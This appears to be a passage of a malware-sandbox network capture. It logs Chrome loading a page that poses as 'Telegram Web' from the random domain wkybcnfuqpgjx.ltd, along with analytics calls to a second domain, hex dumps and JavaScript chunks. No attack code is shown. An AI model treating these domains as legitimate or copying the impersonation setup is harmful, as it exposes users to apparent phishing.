                                  2025-01-12 00:03:47 UTC139INData Raw: 3d 3d 6e 2e 74 79 70 65 29 7b 63 6f 6e 73 74 7b 69 64 3a 65 7d 3d 74 2c 6e 3d 54 2e 67 65 74 28 65 29 3b 6e 3f 6e 2e 72 65 73 6f 6c 76 65 28 29 3a 54 2e 73 65 74 28 65 2c 50 2e 72 65 73 6f 6c 76 65 64 28 29 29 7d 7d 28 65 29 7d 29 29 7d 29 28 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 35 32 38 34 2e 34 31 33 38 30 62 62 65 65 36 31 38 31 39 33 66 38 38 39 61 2e 6a 73 2e 6d 61 70 0d 0a
                                  Data Ascii: ==n.type){const{id:e}=t,n=T.get(e);n?n.resolve():T.set(e,P.resolved())}}(e)}))})();//# sourceMappingURL=5284.41380bbee618193f889a.js.map
                                  2025-01-12 00:03:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.649840172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC379OUTGET /telegram-logo.1b2bb5b107f046ea9325.svg HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:47 UTC909INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:47 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 932
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-3a4"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6955
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYaFQW6DthV70jgMLZcf5gjZ%2BSi1VSM92zvW4x6yCTKsp8ptTYlO7GX%2FJt7m%2BU%2FudubAXpnSuDtpc7f%2FVxzZPwdPSFvYsyzHtwFSCw2osCst1W3W643jq01fTekLPVJFn27VZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2af6a0342ec-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=18089&min_rtt=1810&rtt_var=10469&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=957&delivery_rate=1613259&cwnd=183&unsent_bytes=0&cid=febd4d350c7b6af9&ts=307&x=0"
                                  2025-01-12 00:03:47 UTC460INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 30 20 31 32 30 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 61 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 33 38 41 45 45 42 22 20 6f 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 32 37 39 41 44 31 22 20 6f 66 66 73 65 74 3d 22 31 30 30 25 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 2f 64 65 66 73 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 63 69 72 63 6c 65
                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 120"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="a"><stop stop-color="#38AEEB" offset="0%"/><stop stop-color="#279AD1" offset="100%"/></linearGradient></defs><g fill="none"><circle
                                  2025-01-12 00:03:47 UTC472INData Raw: 32 2e 30 37 2d 2e 30 31 35 20 32 2e 39 36 33 2d 31 2e 30 31 33 20 31 30 2e 32 30 37 2d 34 2e 38 36 20 33 33 2e 37 38 2d 37 2e 30 38 38 20 34 35 2e 32 32 35 2d 2e 39 34 35 20 34 2e 38 33 37 2d 32 2e 38 30 35 20 36 2e 34 35 37 2d 34 2e 36 30 35 20 36 2e 36 31 35 2d 33 2e 39 30 37 2e 33 34 35 2d 36 2e 38 37 37 2d 32 2e 34 37 35 2d 31 30 2e 36 36 34 2d 34 2e 38 36 2d 35 2e 39 32 35 2d 33 2e 37 32 38 2d 37 2e 39 30 35 2d 35 2e 31 2d 31 33 2e 36 35 2d 38 2e 37 33 37 2d 36 2e 36 35 33 2d 34 2e 32 2d 33 2e 39 31 36 2d 35 2e 36 36 33 2d 2e 31 32 38 2d 39 2e 34 33 36 2e 39 39 2d 2e 39 38 32 20 31 37 2e 34 31 35 2d 31 35 2e 39 37 34 20 31 37 2e 36 36 32 2d 31 37 2e 33 34 2e 32 31 2d 31 2e 32 2e 32 38 36 2d 31 2e 33 35 37 2d 2e 32 35 34 2d 31 2e 38 39 37 2d 2e 35 34
                                  Data Ascii: 2.07-.015 2.963-1.013 10.207-4.86 33.78-7.088 45.225-.945 4.837-2.805 6.457-4.605 6.615-3.907.345-6.877-2.475-10.664-4.86-5.925-3.728-7.905-5.1-13.65-8.737-6.653-4.2-3.916-5.663-.128-9.436.99-.982 17.415-15.974 17.662-17.34.21-1.2.286-1.357-.254-1.897-.54


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.649838104.21.42.794432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC516OUTOPTIONS /api/send HTTP/1.1
                                  Host: hu.bafanglaicai.app
                                  Connection: keep-alive
                                  Accept: */*
                                  Access-Control-Request-Method: POST
                                  Access-Control-Request-Headers: content-type
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:48 UTC1208INHTTP/1.1 204 No Content
                                  Date: Sun, 12 Jan 2025 00:03:48 GMT
                                  Content-Length: 0
                                  Connection: close
                                  X-DNS-Prefetch-Control: on
                                  Content-Security-Policy: default-src 'self';img-src * data:;script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';connect-src 'self' api.umami.is cloud.umami.is;frame-ancestors 'self' undefined
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                  Vary: Access-Control-Request-Headers
                                  Access-Control-Allow-Headers: content-type
                                  Access-Control-Max-Age: 86400
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QsL5gye3ssredg%2BOo2ObfERn8n05hpe4VyY4gbg5argC0j7NZphQLKEp7LQWtpPVfNaOCfLK%2BjDfduVTeed2TFBj45ho9V7XI7MtKWfFRGMu7El7%2FAjlogTa6liNeWlB9fOD556"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2af6f60de96-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=17220&min_rtt=1664&rtt_var=9973&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1094&delivery_rate=1754807&cwnd=227&unsent_bytes=0&cid=fb0ff4acb02f9dd3&ts=772&x=0"


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.649839172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC534OUTGET /site.webmanifest HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: manifest
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:48 UTC884INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:48 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1174
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-496"
                                  Accept-Ranges: bytes
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZw8QU8WD%2FnjxUgK2K7kXE0d2GgE6Xnuo3jV7eAbYiFMtZSqpA%2BIi7CkebU1HTAqhPn2ijlEd%2B9fZ5ZNlT8Zg8d4GdjlAoWNkXYzIY7CgqZ2sON88q%2FisjEntbCZ860YMhZCXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2b1390cde93-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=23180&min_rtt=1544&rtt_var=13497&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1112&delivery_rate=1891191&cwnd=248&unsent_bytes=0&cid=0583c5e501c0d561&ts=1033&x=0"
                                  2025-01-12 00:03:48 UTC485INData Raw: 7b 0a 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 54 65 6c 65 67 72 61 6d 20 57 65 62 22 2c 0a 20 20 20 20 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 20 22 54 65 6c 65 67 72 61 6d 20 57 65 62 22 2c 0a 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 54 65 6c 65 67 72 61 6d 20 69 73 20 61 20 63 6c 6f 75 64 2d 62 61 73 65 64 20 6d 6f 62 69 6c 65 20 61 6e 64 20 64 65 73 6b 74 6f 70 20 6d 65 73 73 61 67 69 6e 67 20 61 70 70 20 77 69 74 68 20 61 20 66 6f 63 75 73 20 6f 6e 20 73 65 63 75 72 69 74 79 20 61 6e 64 20 73 70 65 65 64 2e 22 2c 0a 20 20 20 20 22 73 74 61 72 74 5f 75 72 6c 22 3a 20 22 2e 2f 22 2c 0a 20 20 20 20 22 67 63 6d 5f 73 65 6e 64 65 72 5f 69 64 22 3a 20 22 31 32 32 38 36 37 33 38 33 38 33 38 22 2c 0a 20 20 20 20 22 69 63 6f 6e 73 22 3a 20 5b
                                  Data Ascii: { "name": "Telegram Web", "short_name": "Telegram Web", "description": "Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed.", "start_url": "./", "gcm_sender_id": "122867383838", "icons": [
                                  2025-01-12 00:03:48 UTC689INData Raw: 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 69 63 6f 6e 2d 35 31 32 78 35 31 32 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 35 31 32 78 35 31 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 5d 2c 0a 20 20 20 20 22 73 63 72 65 65 6e 73 68 6f 74 73 22 20 3a 20 5b 7b 0a 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 22 2c 0a 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 31 32 38 30 78 38 30 32 22 2c 0a 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 6a 70 65 67
                                  Data Ascii: ge/png" }, { "src": "icon-512x512.png", "sizes": "512x512", "type": "image/png" } ], "screenshots" : [{ "src": "screenshot.jpg", "sizes": "1280x802", "type": "image/jpeg


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.649850149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:48 UTC448OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:49 UTC355INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:49 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.649856104.21.42.794432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC613OUTPOST /api/send HTTP/1.1
                                  Host: hu.bafanglaicai.app
                                  Connection: keep-alive
                                  Content-Length: 177
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-platform: "Windows"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Content-Type: application/json
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:49 UTC177OUTData Raw: 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 70 61 79 6c 6f 61 64 22 3a 7b 22 77 65 62 73 69 74 65 22 3a 22 33 64 32 62 66 65 31 31 2d 61 39 38 66 2d 34 35 61 64 2d 38 39 63 64 2d 38 36 35 61 61 61 33 65 31 63 33 36 22 2c 22 68 6f 73 74 6e 61 6d 65 22 3a 22 77 6b 79 62 63 6e 66 75 71 70 67 6a 78 2e 6c 74 64 22 2c 22 73 63 72 65 65 6e 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 74 69 74 6c 65 22 3a 22 54 65 6c 65 67 72 61 6d 22 2c 22 75 72 6c 22 3a 22 2f 22 7d 7d
                                  Data Ascii: {"type":"event","payload":{"website":"3d2bfe11-a98f-45ad-89cd-865aaa3e1c36","hostname":"wkybcnfuqpgjx.ltd","screen":"1280x1024","language":"en-US","title":"Telegram","url":"/"}}
                                  2025-01-12 00:03:50 UTC1093INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:49 GMT
                                  Content-Type: text/plain
                                  Content-Length: 607
                                  Connection: close
                                  X-DNS-Prefetch-Control: on
                                  Content-Security-Policy: default-src 'self';img-src * data:;script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';connect-src 'self' api.umami.is cloud.umami.is;frame-ancestors 'self' undefined
                                  Access-Control-Allow-Origin: *
                                  ETag: "17u6aooqcovgv"
                                  Vary: Accept-Encoding
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMqehv2sSLS5dATDYeTCSIZ6Bxj4QE11YIaFzP42typjU%2FtzxhLnTAU2M2rahFH0kqpGLG6qbhWZKYkfGDu3H1prI5Ol2VzzTgHwCTBYSuquyI5ntYAVDpFrRriWJwez2m6vfSEG"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ba4e0018c0-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2060&min_rtt=1740&rtt_var=1292&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1390&delivery_rate=679069&cwnd=237&unsent_bytes=0&cid=cab35de2167375c4&ts=641&x=0"
                                  2025-01-12 00:03:50 UTC276INData Raw: 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 70 5a 43 49 36 49 6a 55 30 5a 54 64 6d 59 7a 68 68 4c 54 55 31 4f 57 4d 74 4e 57 4d 32 4d 43 30 35 5a 44 6b 31 4c 54 63 32 59 54 4e 6d 5a 54 5a 68 4f 54 45 33 59 69 49 73 49 6e 64 6c 59 6e 4e 70 64 47 56 4a 5a 43 49 36 49 6a 4e 6b 4d 6d 4a 6d 5a 54 45 78 4c 57 45 35 4f 47 59 74 4e 44 56 68 5a 43 30 34 4f 57 4e 6b 4c 54 67 32 4e 57 46 68 59 54 4e 6c 4d 57 4d 7a 4e 69 49 73 49 6d 68 76 63 33 52 75 59 57 31 6c 49 6a 6f 69 64 32 74 35 59 6d 4e 75 5a 6e 56 78 63 47 64 71 65 43 35 73 64 47 51 69 4c 43 4a 69 63 6d 39 33 63 32 56 79 49 6a 6f 69 59 32 68 79 62 32 31 6c 49 69 77 69 62 33 4d 69 4f 69 4a 58 61 57 35 6b 62 33 64 7a 49 44 45 77 49 69
                                  Data Ascii: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU0ZTdmYzhhLTU1OWMtNWM2MC05ZDk1LTc2YTNmZTZhOTE3YiIsIndlYnNpdGVJZCI6IjNkMmJmZTExLWE5OGYtNDVhZC04OWNkLTg2NWFhYTNlMWMzNiIsImhvc3RuYW1lIjoid2t5YmNuZnVxcGdqeC5sdGQiLCJicm93c2VyIjoiY2hyb21lIiwib3MiOiJXaW5kb3dzIDEwIi
                                  2025-01-12 00:03:50 UTC331INData Raw: 77 49 69 77 69 63 32 4e 79 5a 57 56 75 49 6a 6f 69 4d 54 49 34 4d 48 67 78 4d 44 49 30 49 69 77 69 62 47 46 75 5a 33 56 68 5a 32 55 69 4f 69 4a 6c 62 69 31 56 55 79 49 73 49 6d 4e 76 64 57 35 30 63 6e 6b 69 4f 69 4a 56 55 79 49 73 49 6e 4e 31 59 6d 52 70 64 6d 6c 7a 61 57 39 75 4d 53 49 36 62 6e 56 73 62 43 77 69 63 33 56 69 5a 47 6c 32 61 58 4e 70 62 32 34 79 49 6a 70 75 64 57 78 73 4c 43 4a 6a 61 58 52 35 49 6a 70 75 64 57 78 73 4c 43 4a 6a 63 6d 56 68 64 47 56 6b 51 58 51 69 4f 69 49 79 4d 44 49 31 4c 54 41 78 4c 54 45 79 56 44 41 77 4f 6a 41 7a 4f 6a 51 35 4c 6a 67 31 4e 46 6f 69 4c 43 4a 32 61 58 4e 70 64 45 6c 6b 49 6a 6f 69 4e 6a 41 79 4f 47 49 33 4d 32 4d 74 4d 7a 45 77 4e 79 30 31 59 54 41 33 4c 54 68 6b 59 7a 51 74 5a 54 5a 69 59 32 4d 35 59 54
                                  Data Ascii: wIiwic2NyZWVuIjoiMTI4MHgxMDI0IiwibGFuZ3VhZ2UiOiJlbi1VUyIsImNvdW50cnkiOiJVUyIsInN1YmRpdmlzaW9uMSI6bnVsbCwic3ViZGl2aXNpb24yIjpudWxsLCJjaXR5IjpudWxsLCJjcmVhdGVkQXQiOiIyMDI1LTAxLTEyVDAwOjAzOjQ5Ljg1NFoiLCJ2aXNpdElkIjoiNjAyOGI3M2MtMzEwNy01YTA3LThkYzQtZTZiY2M5YT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.649858172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC444OUTGET /5905.db5d2749ecb90aaf2752.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Accept: */*
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:50 UTC920INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:49 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-223c9"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VO9m1VBr911xZS4WCBw%2BqtPEXA4MDlKh818v%2BcL4ET8obU7Pl7PWsSGfpj6hpI4mo1pY8w7Eh9wTB2M6%2BygolUgpBHVn1Mxebz8Dc6eKpI6mfTxgekwwhvze9eczD4pU3qcjAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ba3ccfde99-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=1022&delivery_rate=415067&cwnd=217&unsent_bytes=0&cid=3298b00a44c1efe0&ts=620&x=0"
                                  2025-01-12 00:03:50 UTC449INData Raw: 37 63 64 64 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 39 30 35 5d 2c 7b 35 39 30 35 3a 28 74 2c 65 29 3d 3e 7b 76 61 72 20 69 2c 73 2c 72 3d 28 69 3d 6e 65 77 20 44 61 74 65 2c 73 3d 34 2c 7b 73 65 74 4c 6f 67 4c 65 76 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 3d 74 3d 3d 74 68 69 73 2e 64 65 62 75 67 3f 31 3a 74 3d 3d 74 68 69 73 2e 69 6e 66 6f 3f 32 3a 74 3d 3d 74 68 69 73 2e 77 61 72 6e 3f 33 3a 28 74 68 69 73 2e 65 72 72 6f 72 2c 34 29 7d 2c 64 65 62 75 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 63 6f 6e 73 6f 6c 65 2e 64 65 62 75 67 26 26 28
                                  Data Ascii: 7cdd(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5905],{5905:(t,e)=>{var i,s,r=(i=new Date,s=4,{setLogLevel:function(t){s=t==this.debug?1:t==this.info?2:t==this.warn?3:(this.error,4)},debug:function(t,e){void 0===console.debug&&(
                                  2025-01-12 00:03:50 UTC1369INData Raw: 69 6f 6e 53 74 72 69 6e 67 28 6e 65 77 20 44 61 74 65 2d 69 2c 31 65 33 29 2b 22 5d 22 2c 22 5b 22 2b 74 2b 22 5d 22 2c 65 29 7d 2c 77 61 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 33 3e 3d 73 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 22 2b 72 2e 67 65 74 44 75 72 61 74 69 6f 6e 53 74 72 69 6e 67 28 6e 65 77 20 44 61 74 65 2d 69 2c 31 65 33 29 2b 22 5d 22 2c 22 5b 22 2b 74 2b 22 5d 22 2c 65 29 7d 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 34 3e 3d 73 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5b 22 2b 72 2e 67 65 74 44 75 72 61 74 69 6f 6e 53 74 72 69 6e 67 28 6e 65 77 20 44 61 74 65 2d 69 2c 31 65 33 29 2b 22 5d 22 2c 22 5b 22 2b 74 2b 22 5d 22 2c 65 29 7d 7d 29 3b 72 2e 67 65 74 44 75 72 61 74 69 6f 6e 53 74
                                  Data Ascii: ionString(new Date-i,1e3)+"]","["+t+"]",e)},warn:function(t,e){3>=s&&console.warn("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)},error:function(t,e){4>=s&&console.error("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)}});r.getDurationSt
                                  2025-01-12 00:03:50 UTC1369INData Raw: 73 69 74 69 6f 6e 2b 74 3c 3d 74 68 69 73 2e 62 75 66 66 65 72 2e 62 79 74 65 4c 65 6e 67 74 68 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 31 3a 69 3d 65 3f 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 49 6e 74 38 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 29 3a 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 55 69 6e 74 38 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 69 3d 65 3f 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 49 6e 74 31 36 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 29 3a 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 55 69 6e 74 31 36 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 69 66 28 65 29 74 68 72 6f 77 22 4e 6f 20 6d 65 74 68
                                  Data Ascii: sition+t<=this.buffer.byteLength){switch(t){case 1:i=e?this.dataview.getInt8(this.position):this.dataview.getUint8(this.position);break;case 2:i=e?this.dataview.getInt16(this.position):this.dataview.getUint16(this.position);break;case 3:if(e)throw"No meth
